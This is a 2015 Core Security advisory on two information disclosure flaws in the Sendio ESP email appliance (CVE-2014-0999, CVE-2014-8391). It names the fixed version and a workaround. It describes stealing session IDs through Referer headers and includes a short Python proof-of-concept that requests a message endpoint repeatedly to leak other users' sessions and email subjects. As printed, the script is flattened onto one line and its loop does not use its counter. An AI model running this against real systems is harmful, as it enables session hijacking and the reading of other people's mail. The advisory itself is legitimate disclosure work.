**Title:**Sendio ESP Information Disclosure Vulnerability
**Advisory ID:**CORE-2015-0010
Advisory URL:<https://www.coresecurity.com/core-labs/advisories/sendio-esp-information-disclosure-vulnerability>
**Date published:**2015-05-22
**Date of last update:**2015-05-22
**Vendors contacted:**Sendio
**Release mode:**Coordinated release
**Class:**OWASP Top Ten 2013 Category A2 - Broken Authentication and Session Management [CWE-930], Information Exposure [CWE-200]
**Impact:**Security bypass
**Remotely Exploitable:**Yes
**Locally Exploitable:**No
CVE Name:CVE-2014-0999, CVE-2014-8391
Sendio [1] ESP (E-mail Security Platform) is a network appliance which provides anti-spam and anti-virus solutions for enterprises. Two information disclosure issues were found affecting some versions of this software, and can lead to leakage of sensitive information such as userβs session identifiers and/or userβs email messages.
Other products and versions might be affected too, but they were not tested.
Sendio informs us that [CVE-2014-0999] and [CVE-2014-8391] are fixed on Sendio software Version 7.2.4.
For [CVE-2014-0999], the vulnerability only exists for HTTP web sessions and not HTTPS web sessions. Sendio recommends that customers who have not upgraded to Version 7.2.4 should disallow HTTP on their Sendio product and only use HTTPS.
This vulnerability was discovered and researched by Martin Gallo from Core Securityβs Consulting Services Team. The publication of this advisory was coordinated by JoaquΓn RodrΓguez Varela from Core Securityβs Advisories Team.
The Sendio [1] ESP Web interface authenticates users with a session cookie named βjsessionidβ. The vulnerability [CVE-2014-0999] is caused due the way the Sendio ESP Web interface handles this authentication cookie, as the βjsessionidβ cookie value is included in URLs when obtaining the content of emails. The URLs used by the application follow this format:
http://<ESP-web-interface-domain>:<ESP-web-interface-port>/sendio/ice/cmd/msg/body;jsessionid=<session-identifier-value>?id=<message-id>
This causes the application to disclose the session identifier value, allowing attackers to perform session hijacking. An attacker might perform this kind of attack by sending an email message containing links or embedded image HTML tags pointing to a controlled web site, and then accessing the victimβs session cookies through the βReferrerβ HTTP header. Accessing this authentication cookie might allow an attacker to hijack a victimβs session and obtain access to email messages or perform actions on behalf of the victim.
The vulnerability [CVE-2014-8391] is caused by an improper handling of usersβ sessions by the Web interface. Under certain conditions, this could lead to the server disclosing sensitive information that was intended for a different user. This information includes, for instance, other usersβ session identifiers, email message identifiers or email message subjects. In order to trigger this vulnerability, requests should be authenticated.
The following Python script can be used to trigger this vulnerability under certain circumstances:
import requests domain = "target.domain.com" # The target domain port = 8888 # The target port jsessionid = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" # A valid jsessionid num = 100000 # No of request to make msgid = 9999999 # A valid message id to baseline the requests url = "http://%s:%d/sendio/ice/cmd/msg/body;jsessionid=%s" % (domain, port, jsessionid) def make_request(id): params = {"id": str(id)} headers = {"Cookie": "JSESSIONID=%s" % jsessionid} return requests.get(url, params=params, headers=headers) print "[*] Reaching the target to define baseline" r = make_request(msgid) baseline_length = r.headers["content-length"] print "[*] Defined baseline: %d bytes" % baseline_length for id in range(0, num): r = make_request(msgid) rlength = int(r.headers["content-length"]) if r.status_code == 200 and rlength != baseline_length: print "\t", r.status_code, rlength, r.text else: print "\t", r.status_code, rlength
[1] <http://www.sendio.com/>.
CoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright Β© 2015 Core Security and Β© 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security advisories team.